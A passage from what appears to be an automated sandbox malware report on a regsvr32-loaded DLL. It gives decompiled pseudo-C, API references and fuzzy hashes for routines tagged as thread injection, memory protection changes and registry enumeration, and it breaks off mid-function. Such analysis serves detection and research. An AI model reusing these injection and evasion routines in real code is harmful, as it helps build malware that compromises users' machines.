                • RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                • HeapFree.KERNEL32(00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?), ref: 04BCBCB3
                • RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                • String ID:
                • API String ID: 1633053242-0
                • Opcode ID: 05a1ec3b20b7b79c1b184b0c4a1cd58d1f83a9ae18b58bb20f28fd83d53fe78f
                • Instruction ID: 15273c4b9e6baed1dcffd6662a58c22a96a10f689351dd5bb7b121a35ee389e4
                • Opcode Fuzzy Hash: 05a1ec3b20b7b79c1b184b0c4a1cd58d1f83a9ae18b58bb20f28fd83d53fe78f
                • Instruction Fuzzy Hash: 5E1119B2504109FFDB019FA6EDC6CAF7B7EFB88254B10046AF91197210EA71AD909B70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2F14 Relevance: 7.5, APIs: 5, Instructions: 49threadinjectionCOMMON
                Download Yara Rule
                C-Code - Quality: 49%
                			E031F2F14(void* __ecx, void* __edi, intOrPtr _a4) {
				unsigned int _v8;
				void* _v12;
				long _t15;
				long _t16;
				signed int _t18;
				signed int _t19;
				unsigned int _t21;
				unsigned int _t26;

				asm("stosd");
				_v12 = _v12 | 0xffffffff;
				while(1) {
					_t15 = QueueUserAPC(E031F2702, GetCurrentThread(),  &_v12); // executed
					if(_t15 == 0) {
						break;
					}
					_t26 = _v8;
					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
					_push(0);
					_push(0x13);
					_push(_t26 >> 5);
					_push(_t18);
					L031F81DA();
					_push(1);
					_t19 = 3;
					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
					_t16 = E031F6F25(_a4, (_t21 >> 6) + _t18);
					if(_t16 == 1) {
						continue;
					} else {
					}
					L5:
					return _t16;
				}
				_t16 = GetLastError();
				goto L5;
			}











                0x031f2f1f
                0x031f2f20
                0x031f2f26
                0x031f2f36
                0x031f2f3e
                0x00000000
                0x00000000
                0x031f2f43
                0x031f2f46
                0x031f2f4a
                0x031f2f4c
                0x031f2f51
                0x031f2f52
                0x031f2f53
                0x031f2f5a
                0x031f2f60
                0x031f2f67
                0x031f2f76
                0x031f2f7e
                0x00000000
                0x00000000
                0x031f2f80
                0x031f2f88
                0x031f2f8a
                0x031f2f8a
                0x031f2f82
                0x00000000

                APIs
                • GetCurrentThread.KERNEL32 ref: 031F2F2A
                • QueueUserAPC.KERNELBASE(031F2702,00000000,?,?,?,031F6D70,?,?), ref: 031F2F36
                • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 031F2F53
                • SleepEx.KERNELBASE(00000003,00000001,?,?,?,031F6D70,?,?), ref: 031F2F67
                  • Part of subcall function 031F6F25: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 031F6F84
                • GetLastError.KERNEL32(?,?,?,031F6D70,?,?), ref: 031F2F82
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                • String ID:
                • API String ID: 2952296216-0
                • Opcode ID: d3a09c5218f26c5d8907b7c34f80855f12118f3e77f1a438075607de699cc3ba
                • Instruction ID: 1b62aaa57b289211795bd16f19a6f6557452de3b2c1b493c4747c3c7c49196cf
                • Opcode Fuzzy Hash: d3a09c5218f26c5d8907b7c34f80855f12118f3e77f1a438075607de699cc3ba
                • Instruction Fuzzy Hash: AD0167B6A50214BFD718EAA4DC1EFEE767CE748710F040654F612D6180D7B0D681C660
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD7254 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6), ref: 04BD7279
                • GetLastError.KERNEL32(?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BD7281
                • VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F), ref: 04BD7298
                • VirtualProtect.KERNEL32(?,00000000,-2C9B417C,00000004,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7), ref: 04BD72BD
                • SetLastError.KERNEL32(00000000,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BD72C6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Virtual$ErrorLastProtect$Query
                • String ID:
                • API String ID: 148356745-0
                • Opcode ID: 344188ca394a8f7a223e62d0a7f9b4b153405c3609d27732d71213dfa5fc67ca
                • Instruction ID: b54377e7d314b22db976d2a1c4662b1465231b142c650cf4b82ed35fa39237b7
                • Opcode Fuzzy Hash: 344188ca394a8f7a223e62d0a7f9b4b153405c3609d27732d71213dfa5fc67ca
                • Instruction Fuzzy Hash: F0012976500209EF9F11AF96DC48CDABBB9EB4D2507004466F901D7211EB71EA149B70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F5CF6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F5CF6(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E031F3B1B(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x31fa2d8; // 0x240d5a8
				_t4 = _t24 + 0x31fbe38; // 0x56093e0
				_t5 = _t24 + 0x31fbde0; // 0x4f0053
				_t26 = E031F71E5( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x31fa2d8; // 0x240d5a8
						_t11 = _t32 + 0x31fbe2c; // 0x56093d4
						_t48 = _t11;
						_t12 = _t32 + 0x31fbde0; // 0x4f0053
						_t52 = E031F6C7B(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x31fa2d8; // 0x240d5a8
							_t13 = _t35 + 0x31fbe76; // 0x30314549
							_t37 = E031F36C5(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x31fa2b4 - 6;
								if( *0x31fa2b4 <= 6) {
									_t42 =  *0x31fa2d8; // 0x240d5a8
									_t15 = _t42 + 0x31fbdc2; // 0x52384549
									E031F36C5(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x31fa2d8; // 0x240d5a8
							_t17 = _t38 + 0x31fbe70; // 0x5609418
							_t18 = _t38 + 0x31fbe48; // 0x680043
							_t45 = E031F2BC9(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x31fa290, 0, _t52);
						}
					}
					HeapFree( *0x31fa290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E031F73B2(_t54);
				}
				return _t45;
			}



















                0x031f5cf6
                0x031f5d06
                0x031f5d09
                0x031f5d10
                0x031f5d12
                0x031f5d12
                0x031f5d15
                0x031f5d1a
                0x031f5d21
                0x031f5d2e
                0x031f5d33
                0x031f5d37
                0x031f5d45
                0x031f5d53
                0x031f5d57
                0x031f5de8
                0x031f5de8
                0x031f5d5d
                0x031f5d5d
                0x031f5d62
                0x031f5d62
                0x031f5d69
                0x031f5d75
                0x031f5d77
                0x031f5d79
                0x031f5d7b
                0x031f5d82
                0x031f5d8d
                0x031f5d94
                0x031f5d96
                0x031f5d9d
                0x031f5d9f
                0x031f5da6
                0x031f5db1
                0x031f5db1
                0x031f5d9d
                0x031f5db6
                0x031f5dbb
                0x031f5dc2
                0x031f5de0
                0x031f5de2
                0x031f5de2
                0x031f5d79
                0x031f5df4
                0x031f5df4
                0x031f5df6
                0x031f5dfb
                0x031f5dfd
                0x031f5dfd
                0x031f5e08

                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,056093E0,00000000,?,74E5F710,00000000,74E5F730), ref: 031F5D45
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05609418,?,00000000,30314549,00000014,004F0053,056093D4), ref: 031F5DE2
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,031F54C0), ref: 031F5DF4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: 4c32a1ebb27ad7adfc2d099c5a5a319a3af6481ae8d7d51d6d9c534252a7c6b2
                • Instruction ID: 19c48d46b8224298e603f82d4bcc0105a3e79a1d00ce647d15306716490237b0
                • Opcode Fuzzy Hash: 4c32a1ebb27ad7adfc2d099c5a5a319a3af6481ae8d7d51d6d9c534252a7c6b2
                • Instruction Fuzzy Hash: 1F31E236A00208BFDB15EBA4DC88EDA7BBDFF0D704F184155EB049B121D771AA55DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDB084 Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 04BDB0B2
                • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 04BDB13C
                • WaitForSingleObject.KERNEL32(00000064), ref: 04BDB14A
                • SuspendThread.KERNELBASE(?), ref: 04BDB15D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                • String ID:
                • API String ID: 3168247402-0
                • Opcode ID: fa3a224281e590b7b744c1bc93332e83da3b5fd9f3602c0b9b747d8607dcdb1d
                • Instruction ID: 2bf2d15c551f49483ecc8e3ca7cb2cd0c19c9cbc521e57485a67e90f8f992357
                • Opcode Fuzzy Hash: fa3a224281e590b7b744c1bc93332e83da3b5fd9f3602c0b9b747d8607dcdb1d
                • Instruction Fuzzy Hash: CD415F71108301AFE721EF65CC80E6BBBE9FF88354F00496DFA9592164E731F9648B62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2711 Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E031F2711(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				long _t52;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0x31fa144(0, 1,  &_v24); // executed
				if(_t44 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E031F2114(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x31fa2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E031F2C11(_v20);
							if(_v8 == 0) {
								_t52 = E031F4E7A(_v24, _t64); // executed
								_v8 = _t52;
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}




















                0x031f2719
                0x031f271c
                0x031f2725
                0x031f2728
                0x031f272b
                0x031f2733
                0x031f2831
                0x031f283c
                0x031f283f
                0x031f2847
                0x031f284e
                0x031f284e
                0x031f2841
                0x031f2844
                0x031f2844
                0x00000000
                0x031f2844
                0x031f273c
                0x00000000
                0x00000000
                0x031f2749
                0x031f2751
                0x031f2828
                0x00000000
                0x031f2828
                0x031f275d
                0x031f2764
                0x031f2767
                0x031f2816
                0x031f281d
                0x031f281d
                0x031f2823
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x031f276d
                0x031f276d
                0x031f276d
                0x031f276d
                0x031f2772
                0x031f2774
                0x031f2774
                0x031f2781
                0x031f2789
                0x00000000
                0x00000000
                0x031f278b
                0x031f2798
                0x031f279e
                0x031f279e
                0x031f27a1
                0x00000000
                0x00000000
                0x031f27ae
                0x031f27c2
                0x031f27f8
                0x031f27fb
                0x031f27fe
                0x031f2806
                0x031f280c
                0x031f2811
                0x031f2811
                0x00000000
                0x031f2806
                0x031f27c4
                0x031f27cb
                0x031f27d3
                0x00000000
                0x00000000
                0x031f27d5
                0x031f27e0
                0x031f27e3
                0x00000000
                0x031f27ea
                0x031f27ea
                0x00000000
                0x031f27ea
                0x031f27e3
                0x031f27ab
                0x00000000
                0x031f27ed
                0x031f27ed
                0x00000000

                APIs
                • GetLastError.KERNEL32 ref: 031F2831
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • GetLastError.KERNEL32 ref: 031F27A5
                • WaitForSingleObject.KERNEL32(00000000), ref: 031F27B5
                • GetLastError.KERNEL32 ref: 031F27D5
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                • String ID:
                • API String ID: 35602742-0
                • Opcode ID: 7b02951426657e0c6798da6228ea64545315c250c25559e00e11dc26ceff5a6a
                • Instruction ID: fd56380930bb2ccbff10fadaff3fb1f05e71594c081f4d951edda2bcb6edd4e9
                • Opcode Fuzzy Hash: 7b02951426657e0c6798da6228ea64545315c250c25559e00e11dc26ceff5a6a
                • Instruction Fuzzy Hash: CC410CB8D00209EFDF14EF94C9849ADBBB8FF0C344B2449A9E602E7150D7309A86DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F1900 Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F1900(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E031F2114(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E031F2C11(_v28);
							goto L17;
						}
						_t42 = E031F1B78(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E031F2C11(_v24);
						_v20 = _v16;
						_t47 = E031F2114(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x31fa2c4, 0) == 0x102);
				goto L16;
			}

















                0x031f1900
                0x031f191a
                0x031f191d
                0x031f1920
                0x031f1923
                0x031f1926
                0x031f192c
                0x031f1930
                0x031f1a0a
                0x031f1a0e
                0x031f1a0e
                0x031f1939
                0x031f1940
                0x031f1947
                0x031f194a
                0x031f19ff
                0x031f1a02
                0x00000000
                0x031f1a08
                0x031f1950
                0x031f1953
                0x031f195a
                0x031f1964
                0x031f196d
                0x031f1973
                0x031f197b
                0x031f19b3
                0x031f19ed
                0x031f19f3
                0x031f19f5
                0x031f19f5
                0x031f19f7
                0x031f19fa
                0x00000000
                0x031f19fa
                0x031f19c8
                0x031f19cd
                0x031f19d1
                0x00000000
                0x00000000
                0x00000000
                0x031f19d1
                0x031f1980
                0x031f198f
                0x00000000
                0x00000000
                0x031f1994
                0x031f199d
                0x031f19a0
                0x031f19a7
                0x031f19aa
                0x031f1985
                0x031f1985
                0x00000000
                0x031f1985
                0x031f19ae
                0x00000000
                0x031f19ae
                0x031f1982
                0x00000000
                0x031f19d3
                0x031f19e0
                0x00000000

                APIs
                • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,031F61AC,?), ref: 031F1926
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • RegEnumKeyExA.KERNELBASE(?,?,?,031F61AC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,031F61AC), ref: 031F196D
                • WaitForSingleObject.KERNEL32(00000000,?,?,?,031F61AC,?,031F61AC,?,?,?,?,?,031F61AC,?), ref: 031F19DA
                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,031F61AC,?), ref: 031F1A02
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                • String ID:
                • API String ID: 3664505660-0
                • Opcode ID: cf2da1fd35915f6f179c347d06e38e256801fec147e1c3b2a178a5127190cdca
                • Instruction ID: f60d01f5d87dfec6c8301e9c4bfc66c47de10996a1e7b311f72fc111eb67f7bb
                • Opcode Fuzzy Hash: cf2da1fd35915f6f179c347d06e38e256801fec147e1c3b2a178a5127190cdca
                • Instruction Fuzzy Hash: 85311876C00219FFCF21EB99D8459EEFBBDFB88710F144166EA15B2150D3744A91DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2C2D Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                Download Yara Rule
                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 031F2C84
                • SysAllocString.OLEAUT32(031F1C26), ref: 031F2CC7
                • SysFreeString.OLEAUT32(00000000), ref: 031F2CDB
                • SysFreeString.OLEAUT32(00000000), ref: 031F2CE9
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 0e12d637cc0021e89564df73163a693e0a5c987a423cf671a99ed3a849ccced7
                • Instruction ID: 852a81fcb7dfef383a32edd68a9bd813b0a5715f3df90a40b73740bea778dbfb
                • Opcode Fuzzy Hash: 0e12d637cc0021e89564df73163a693e0a5c987a423cf671a99ed3a849ccced7
                • Instruction Fuzzy Hash: A9311D75900149EFCB05DF98D8D48AEBBB9FF4C344B24842EFA0A97210D7759686CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F611C Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E031F611C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E031F2031(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E031F5E26(_t23);
						}
					}
					return _t38;
				}
				_t26 = E031F3B1B(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x31fa304, 1, 0,  *0x31fa3a4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E031F1900(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E031F1B78(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E031F73B2(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E031F57E8( &_v32, _t39);
					goto L13;
				}
			}














                0x031f611c
                0x031f6129
                0x031f612f
                0x031f6130
                0x031f6131
                0x031f6132
                0x031f6133
                0x031f6137
                0x031f613e
                0x031f6143
                0x031f6147
                0x031f61cf
                0x031f61cf
                0x031f61d2
                0x031f61d4
                0x031f61dc
                0x031f61e2
                0x031f61e5
                0x031f61e5
                0x031f61e2
                0x031f61f0
                0x031f61f0
                0x031f6153
                0x031f615a
                0x031f615c
                0x031f615c
                0x031f6173
                0x031f6177
                0x031f617a
                0x031f6185
                0x031f618c
                0x031f618c
                0x031f6198
                0x031f6199
                0x031f61a7
                0x031f619b
                0x031f619b
                0x031f619c
                0x031f619d
                0x031f619e
                0x031f619f
                0x031f61a0
                0x031f61a0
                0x031f61ac
                0x031f61b1
                0x031f61b3
                0x031f61b5
                0x031f61b5
                0x031f61bc
                0x00000000
                0x031f61be
                0x031f61be
                0x031f61cb
                0x00000000
                0x031f61cb

                APIs
                • CreateEventA.KERNEL32(031FA304,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 031F616D
                • SetEvent.KERNEL32(00000000), ref: 031F617A
                • Sleep.KERNEL32(00000BB8), ref: 031F6185
                • CloseHandle.KERNEL32(00000000), ref: 031F618C
                  • Part of subcall function 031F1900: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,031F61AC,?), ref: 031F1926
                  • Part of subcall function 031F1900: RegEnumKeyExA.KERNELBASE(?,?,?,031F61AC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,031F61AC), ref: 031F196D
                  • Part of subcall function 031F1900: WaitForSingleObject.KERNEL32(00000000,?,?,?,031F61AC,?,031F61AC,?,?,?,?,?,031F61AC,?), ref: 031F19DA
                  • Part of subcall function 031F1900: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,031F61AC,?), ref: 031F1A02
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                • String ID:
                • API String ID: 891522397-0
                • Opcode ID: 131b9d0cf0ee8852fb54281f4d6ef80c22f6c1f776ae029674e40edbcabec476
                • Instruction ID: d486b3441fe97b7b9a7f3891690fc36aa593559efae4c1a1c029a939e8e02064
                • Opcode Fuzzy Hash: 131b9d0cf0ee8852fb54281f4d6ef80c22f6c1f776ae029674e40edbcabec476
                • Instruction Fuzzy Hash: 10216276904219AFCB10FFE488849EEB7BDEF8C250B094525EB55EB101D734D985CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F55E9 Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F55E9(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
